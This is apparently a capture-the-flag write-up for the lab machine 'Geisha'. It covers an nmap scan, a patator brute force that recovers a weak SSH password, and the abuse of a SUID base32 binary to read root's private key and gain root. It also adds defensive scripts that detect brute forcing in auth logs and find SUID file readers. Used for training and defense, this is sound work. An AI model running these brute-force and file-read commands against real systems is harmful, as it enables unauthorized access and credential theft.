Geisha - OSPG


Summary

We obtain initial access by brute-forcing the SSH password of the user geisha. Privilege escalation goes through a misconfigured SUID binary, /usr/bin/base32, which we abuse to read root's SSH private key and log in as root.


Enumeration

Let us begin with an nmap scan.

PORT     STATE SERVICE       REASON         VERSION
21/tcp   open  ftp           syn-ack ttl 63 vsftpd 3.0.3      
22/tcp   open  ssh           syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)                                                                     
80/tcp   open  http          syn-ack ttl 63 Apache httpd 2.4.38 ((Debian))
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)                        
|_http-title: Geisha
7080/tcp open  ssl/empowerid syn-ack ttl 63 LiteSpeed                            
| http-methods:       
|_  Supported Methods: GET HEAD POST             
|_http-server-header: LiteSpeed
|_http-title: Did not follow redirect to https://192.168.199.82:7080/      
| ssl-cert: Subject: commonName=geisha/organizationName=webadmin/countryName=US/X509v3 Subject Alternative Name=DNS.1=42.114.248.217
| Issuer: commonName=geisha/organizationName=webadmin/countryName=US/X509v3 Subject Alternative Name=DNS.1=42.114.248.217
7125/tcp open  http          syn-ack ttl 62 nginx 1.17.10
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.17.10
|_http-title: Geisha
8088/tcp open  http          syn-ack ttl 63 LiteSpeed httpd
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: LiteSpeed
|_http-title: Geisha
9198/tcp open  http          syn-ack ttl 63 SimpleHTTPServer 0.6 (Python 2.7.16)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: SimpleHTTP/0.6 Python/2.7.16
|_http-title: Geisha

A few web directory scans turned up a /passwd file on the HTTP service on port 7125, which revealed the username geisha.

Exploitation

SSH Brute-force

Running patator against the SSH service with rockyou.txt, we find the password for geisha after a few minutes. The -x ignore filter suppresses the "Authentication failed." responses so that only hits are printed.

patator ssh_login host=192.168.199.82 user=geisha password=FILE0 0=/usr/share/wordlists/rockyou.txt -x ignore:mesg='Authentication failed.'
03:34:21 patator    INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.9.7 at 2021-11-15 03:34 EST
03:34:21 patator    INFO -                                                                              
03:34:21 patator    INFO - code  size    time | candidate                          |   num | mesg
03:34:21 patator    INFO - -----------------------------------------------------------------------------
03:37:25 patator    INFO - 0     39     0.476 | letmein                            |   512 | SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2
^C03:39:51 patator    INFO - Hits/Done/Skip/Fail/Size: 1/919/0/0/14344392, Avg: 2 r/s, Time: 0h 5m 29s
03:39:51 patator    INFO - To resume execution, pass --resume 92,93,91,93,92,92,91,93,91,91

With this password we can SSH in as geisha.
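What that patator run looks like from the target's side, as an added example that is not part of the original write-up: OpenSSH writes one auth-log line per failed password, so a slow brute force (about 2 requests per second here, 919 attempts in five minutes) is easy to count, and a successful login from a source that had many failures against the same user is the signature of a successful brute force. The log lines and the attacking address 192.168.49.199 are constructed for this example.

```shell
#!/bin/sh
# Added example (not part of the original write-up): the target-side view of
# the patator run. SAMPLE_LOG is constructed; the 192.168.49.199 source
# address is an assumption.
SAMPLE_LOG='Nov 15 03:34:21 geisha sshd[1201]: Failed password for geisha from 192.168.49.199 port 41022 ssh2
Nov 15 03:34:22 geisha sshd[1203]: Failed password for geisha from 192.168.49.199 port 41024 ssh2
Nov 15 03:34:22 geisha sshd[1205]: Failed password for invalid user admin from 10.0.0.7 port 5000 ssh2
Nov 15 03:34:23 geisha sshd[1207]: Failed password for geisha from 192.168.49.199 port 41026 ssh2
Nov 15 03:37:25 geisha sshd[1301]: Accepted password for geisha from 192.168.49.199 port 41940 ssh2
Nov 15 03:37:30 geisha sshd[1305]: Failed password for root from 10.0.0.7 port 5002 ssh2'

write_sample_log() { printf '%s\n' "$SAMPLE_LOG" > "$1"; }

# ssh_bruteforce_report LOGFILE THRESHOLD
# HIT   n src user : a password was accepted for a (src,user) pair that had n
#                    earlier failures, the signature of a successful brute force.
# BRUTE n src user : n >= THRESHOLD failures for the pair, whether it hit or not.
ssh_bruteforce_report() {
  awk -v thr="$2" '
    # key() extracts "src user" from a Failed/Accepted password line;
    # "invalid user" is stripped so unknown names are counted like real ones.
    function key(  u, s) {
      u = $0; sub(/.*password for (invalid user )?/, "", u)
      s = u; sub(/ from .*/, "", u); sub(/.* from /, "", s); sub(/ port .*/, "", s)
      return s " " u
    }
    / sshd.*: Failed password for /   { fails[key()]++ }
    / sshd.*: Accepted password for / { k = key(); if (fails[k] > 0) print "HIT", fails[k], k }
    END { for (k in fails) if (fails[k] >= thr) print "BRUTE", fails[k], k }
  ' "$1"
}

# Stand-alone usage on the constructed log.
log=$(mktemp); write_sample_log "$log"; ssh_bruteforce_report "$log" 3; rm -f "$log"
```

On a real box point it at /var/log/auth.log (or at `journalctl -u ssh` output); the HIT line is the one worth alerting on, because it tells you the guessing worked and which account to reset.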


Privilege Escalation

Enumerating the system locally, we find a misconfigured SUID binary: base32 has the setuid bit set, so it runs with its owner's privileges and can read any file the owner can.

geisha@geisha:~$ find / -perm -u=s -type f 2>/dev/null
...                                                             
/usr/bin/base32                                                                        
...

Using the GTFOBins file-read technique for base32, we read root's SSH private key: the SUID base32 encodes the file with root's privileges, and a second, unprivileged base32 decodes it back to plaintext.

geisha@geisha:~$ LFILE=/root/.ssh/id_rsa
geisha@geisha:~$ base32 "$LFILE" | base32 --decode
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----
We save the key on our machine as id_rsa, restrict it to mode 600 (ssh refuses a key file readable by others), and log in as root.

$ ssh -i id_rsa root@192.168.199.82
Linux geisha 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1+deb10u1 (2020-04-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@geisha:~# id
uid=0(root) gid=0(root) groups=0(root)
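The privilege escalation step above, as an added example that is not code from the original write-up: it automates the two things done by hand there (enumerate SUID files and pick out the ones that are arbitrary-file-read primitives), shows the base32 read itself, and shows the fix. The fixture directory, the fake binaries in it and the short FILE_READ_SUID list are constructed for this example and are assumptions; run suid_file_readers against / on a real host. The read helper needs GNU coreutils base32 on PATH.

```shell
#!/bin/sh
# Added example, not part of the original write-up. The list of SUID
# binaries that give an arbitrary file read is an assumption kept short;
# GTFOBins documents many more.
FILE_READ_SUID='base32 base64 base58 cat cut dd head od tail xxd more less sort uniq'

# suid_file_readers ROOT: print "path name" for every SUID regular file under
# ROOT whose basename is in FILE_READ_SUID. Use ROOT=/ on a real box.
suid_file_readers() {
  find "$1" -xdev -type f -perm -4000 2>/dev/null | while IFS= read -r p; do
    b=$(basename "$p")
    for n in $FILE_READ_SUID; do
      [ "$b" = "$n" ] && printf '%s %s\n' "$p" "$b"
    done
  done
}

# read_via_base32 FILE: the GTFOBins primitive used against /root/.ssh/id_rsa.
# With a SUID base32 the first command reads FILE as the binary's owner; the
# second base32 is an ordinary decode that runs as the caller.
read_via_base32() { base32 "$1" | base32 --decode; }

# drop_suid PATH: the fix. coreutils does not ship base32 setuid, so clearing
# the bit restores the normal mode.
drop_suid() { chmod u-s "$1"; }

# make_fixture: constructed tree with a fake SUID base32, a non-SUID cat and a
# file to read. Prints the fixture root. Setting the setuid bit on a file you
# own needs no privilege, which is why this runs as any user.
make_fixture() {
  d=$(mktemp -d)
  mkdir -p "$d/usr/bin"
  printf '#!/bin/sh\n' > "$d/usr/bin/base32"; chmod 4755 "$d/usr/bin/base32"
  printf '#!/bin/sh\n' > "$d/usr/bin/cat";    chmod 0755 "$d/usr/bin/cat"
  printf 'secret\n' > "$d/secret.txt"
  printf '%s\n' "$d"
}

# Stand-alone usage: enumerate the fixture, read a file, fix, re-enumerate.
root=$(make_fixture)
suid_file_readers "$root"
read_via_base32 "$root/secret.txt"
drop_suid "$root/usr/bin/base32"
suid_file_readers "$root"
rm -rf "$root"
```

The enumeration is the same `find -perm` the write-up uses, restricted to regular files and one filesystem so that /proc and mounted shares do not flood the output; the name match is deliberately exact so that a SUID binary merely called "cat-wrapper" is not flagged on a name substring.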